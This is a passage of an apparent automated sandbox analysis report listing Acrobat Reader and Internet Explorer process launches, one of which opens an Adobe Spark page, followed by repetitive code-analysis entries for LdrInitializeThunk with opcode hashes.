                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --touch-events=enabled --field-trial-handle=1696,14583101347345561594,418495030725437647,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=15500690304138507742 --lang=en-US --disable-pack-loading --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.12.20035 Chrome/80.0.0.0' --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=15500690304138507742 --renderer-client-id=4 --mojo-platform-channel-handle=1868 --allow-no-sandbox-job /prefetch:1
                                                                                                                                                                                                                                                        Imagebase:0xba0000
                                                                                                                                                                                                                                                        File size:9475120 bytes
                                                                                                                                                                                                                                                        MD5 hash:9AEBA3BACD721484391D15478A4080C7
                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:moderate

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Start time:10:39:24
                                                                                                                                                                                                                                                        Start date:11/06/2021
                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --touch-events=enabled --field-trial-handle=1696,14583101347345561594,418495030725437647,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=4408287619177528861 --lang=en-US --disable-pack-loading --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.12.20035 Chrome/80.0.0.0' --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=4408287619177528861 --renderer-client-id=5 --mojo-platform-channel-handle=1872 --allow-no-sandbox-job /prefetch:1
                                                                                                                                                                                                                                                        Imagebase:0xba0000
                                                                                                                                                                                                                                                        File size:9475120 bytes
                                                                                                                                                                                                                                                        MD5 hash:9AEBA3BACD721484391D15478A4080C7
                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:moderate

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Start time:10:39:25
                                                                                                                                                                                                                                                        Start date:11/06/2021
                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --touch-events=enabled --field-trial-handle=1696,14583101347345561594,418495030725437647,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=4271642722203936314 --lang=en-US --disable-pack-loading --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.12.20035 Chrome/80.0.0.0' --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=4271642722203936314 --renderer-client-id=6 --mojo-platform-channel-handle=2204 --allow-no-sandbox-job /prefetch:1
                                                                                                                                                                                                                                                        Imagebase:0xba0000
                                                                                                                                                                                                                                                        File size:9475120 bytes
                                                                                                                                                                                                                                                        MD5 hash:9AEBA3BACD721484391D15478A4080C7
                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:moderate

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Start time:10:40:13
                                                                                                                                                                                                                                                        Start date:11/06/2021
                                                                                                                                                                                                                                                        Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                        Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' https://spark.adobe.com/page/GG8mUEsjQvSUh/
                                                                                                                                                                                                                                                        Imagebase:0x7ff698cb0000
                                                                                                                                                                                                                                                        File size:823560 bytes
                                                                                                                                                                                                                                                        MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Start time:10:40:14
                                                                                                                                                                                                                                                        Start date:11/06/2021
                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1968 CREDAT:17410 /prefetch:2
                                                                                                                                                                                                                                                        Imagebase:0x9c0000
                                                                                                                                                                                                                                                        File size:822536 bytes
                                                                                                                                                                                                                                                        MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                                                        Code Analysis

                                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                          Execution Coverage:13.5%
                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                                          Total number of Nodes:1
                                                                                                                                                                                                                                                          Total number of Limit Nodes:0

                                                                                                                                                                                                                                                          Graph

                                                                                                                                                                                                                                                          execution_graph 92 4f1d003 LdrInitializeThunk

                                                                                                                                                                                                                                                          Callgraph

                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 3 4f1d1d0-4f1d1dc LdrInitializeThunk
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.364878132.0000000004F1D000.00000020.00000001.sdmp, Offset: 04F1D000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4f1d000_AcroRd32.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                          • Opcode ID: 7e47dad86479da47a279e07b6665d510168b853dcf6ee2752cb09e064007092b
                                                                                                                                                                                                                                                          • Instruction ID: f712c09118f7ab06895c2f92f54f831258102bbc0871f5471167a53f10353a1b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e47dad86479da47a279e07b6665d510168b853dcf6ee2752cb09e064007092b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C9002B138100C52D500A15A4409B46010957E0341FA9C016A0218654DCE55C87175A1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 0 4f1d003-4f1d01c LdrInitializeThunk
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.364878132.0000000004F1D000.00000020.00000001.sdmp, Offset: 04F1D000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4f1d000_AcroRd32.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                          • Opcode ID: 6c23d526ef4fac2f7a5b13f284d03bb29a1195ec95634414390f345823822591
                                                                                                                                                                                                                                                          • Instruction ID: 77b8fc7dc73da98ae31eac2813c7c14ff687510958d831b7b10667b6ebccd7bb
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c23d526ef4fac2f7a5b13f284d03bb29a1195ec95634414390f345823822591
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2AC04CA618E7D45FD70353751C7AAD62F651E93111B9F81D7D080CB4ABC4084AAA9373
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 9 4f1d750-4f1d75c LdrInitializeThunk
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.364878132.0000000004F1D000.00000020.00000001.sdmp, Offset: 04F1D000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4f1d000_AcroRd32.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                          • Opcode ID: 29a4828123023646854a7bbbcb48b4819c91ec2835c90ceab7cf9a40c6c5dfcf
                                                                                                                                                                                                                                                          • Instruction ID: afc34d6a9a137a3c542639b049d78ead32c0aee77a63480a3447406eeacafe08
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 29a4828123023646854a7bbbcb48b4819c91ec2835c90ceab7cf9a40c6c5dfcf
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F89002B939300412D580B15A540D60A010957D1242FE9D415A0109558CCD55887963A1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 6 4f1d350-4f1d35c LdrInitializeThunk
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.364878132.0000000004F1D000.00000020.00000001.sdmp, Offset: 04F1D000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4f1d000_AcroRd32.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                          • Opcode ID: 8d89eae79bf23fd2470a217f38d913a545bfe8558363e65addd2e62fded9dca4
                                                                                                                                                                                                                                                          • Instruction ID: 5ea3d84543781284fe2818d238d8025bab4dbd911074f17dbebd2ae9ea90420b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d89eae79bf23fd2470a217f38d913a545bfe8558363e65addd2e62fded9dca4
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C9002F138504492D511A25A4409F0A420D57E0285FE9C016A0148594CCD658972E1A1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 1 4f1d050-4f1d05c LdrInitializeThunk
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.364878132.0000000004F1D000.00000020.00000001.sdmp, Offset: 04F1D000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4f1d000_AcroRd32.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                          • Opcode ID: 4c84151277232184f4ece1caff9d03736cb5b2ac7b5af92573ec6003a39c157d
                                                                                                                                                                                                                                                          • Instruction ID: c167b7542daf6858573f5189dc2cfda649c436be1ab1a95d524171969364458c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c84151277232184f4ece1caff9d03736cb5b2ac7b5af92573ec6003a39c157d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B9002B178500812D541B15A4459706011D57D0281FE9C012A0118554DCE958B76B6E1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 8 4f1d6d0-4f1d6dc LdrInitializeThunk
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.364878132.0000000004F1D000.00000020.00000001.sdmp, Offset: 04F1D000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4f1d000_AcroRd32.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                          • Opcode ID: dfe2004c431489e9de8f4bf325dee0477a038e150051f59701c81b6116e10e0f
                                                                                                                                                                                                                                                          • Instruction ID: 410af6811aa0a808a77b91965b216cec03cf9dd7cdf36a1e6e8a0aa3957d8b51
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dfe2004c431489e9de8f4bf325dee0477a038e150051f59701c81b6116e10e0f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 499002B138100812D500A59A540D646010957E0341FA9D011A5118555ECEA588B171B1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 4 4f1d2d0-4f1d2dc LdrInitializeThunk
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.364878132.0000000004F1D000.00000020.00000001.sdmp, Offset: 04F1D000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4f1d000_AcroRd32.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                          • Opcode ID: b2a3f88fabd24f7c8c3c2fafaa86054f15987965036c94671819ae633b8cb8be
                                                                                                                                                                                                                                                          • Instruction ID: 595b96017b642c6488b1f85f8e50c5a5e77438745a2681b1e6536427cda0bd29
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b2a3f88fabd24f7c8c3c2fafaa86054f15987965036c94671819ae633b8cb8be
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D9002B139114812D510A15A8409706010957D1241FA9C411A0918558DCED588B171A2
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 10 4f1d790-4f1d79c LdrInitializeThunk
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.364878132.0000000004F1D000.00000020.00000001.sdmp, Offset: 04F1D000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4f1d000_AcroRd32.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                          • Opcode ID: ca610c29548365b14193f4b3733efc108bc5fba3ea4f85a3fdda65596795f4ca
                                                                                                                                                                                                                                                          • Instruction ID: 24c222a81b5e1cdc8929526d861eb7b7469039e69b5b0c81c8aede3c95c81b83
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca610c29548365b14193f4b3733efc108bc5fba3ea4f85a3fdda65596795f4ca
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F9002B138100413D540B15A541D6064109A7E1341FA9D011E0508554CDD55887662A2
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 7 4f1d490-4f1d49c LdrInitializeThunk
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.364878132.0000000004F1D000.00000020.00000001.sdmp, Offset: 04F1D000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4f1d000_AcroRd32.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                          • Opcode ID: 27f39f725fbc4ddf4ed6edbdbaf2fb901154df17dbddf5cfe2b0171797882fc8
                                                                                                                                                                                                                                                          • Instruction ID: ed9f01ea0f7c23bd89b61a385316db703e49615f704c05367ebdf9426b085d9c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27f39f725fbc4ddf4ed6edbdbaf2fb901154df17dbddf5cfe2b0171797882fc8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 409002B138100812D500A19A4409706010957D0241FA9C412E0618558DCE95887175B1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 2 4f1d110-4f1d11c LdrInitializeThunk
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.364878132.0000000004F1D000.00000020.00000001.sdmp, Offset: 04F1D000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4f1d000_AcroRd32.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                          • Opcode ID: 974553679e260ee94105ede55221de7ebabb8bf32f6d2476e9886545627095af
                                                                                                                                                                                                                                                          • Instruction ID: e9e25a79da4b49eba1e8d7fe18c27522da9b3995b9a6b5d6e8808763a65d6502
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 974553679e260ee94105ede55221de7ebabb8bf32f6d2476e9886545627095af
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 699002B138504852D500A55A540DA06010957D0245FA9D011A1158595DCE758871B1B1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 5 4f1d310-4f1d31c LdrInitializeThunk
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.364878132.0000000004F1D000.00000020.00000001.sdmp, Offset: 04F1D000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4f1d000_AcroRd32.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                          • Opcode ID: 94fe9238a1e4ce733e42958529fbd4d5e349bfa2a5c7ed018426c4686885a88d
                                                                                                                                                                                                                                                          • Instruction ID: 9447b12b62010385d9d3105b563272ad9021b1b32defda6667d104bdddd03be6
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 94fe9238a1e4ce733e42958529fbd4d5e349bfa2a5c7ed018426c4686885a88d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 079002F13C100852D500A15A4419B06010997E1341FA9C015E1158554DCE59CC7271A6
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Non-executed Functions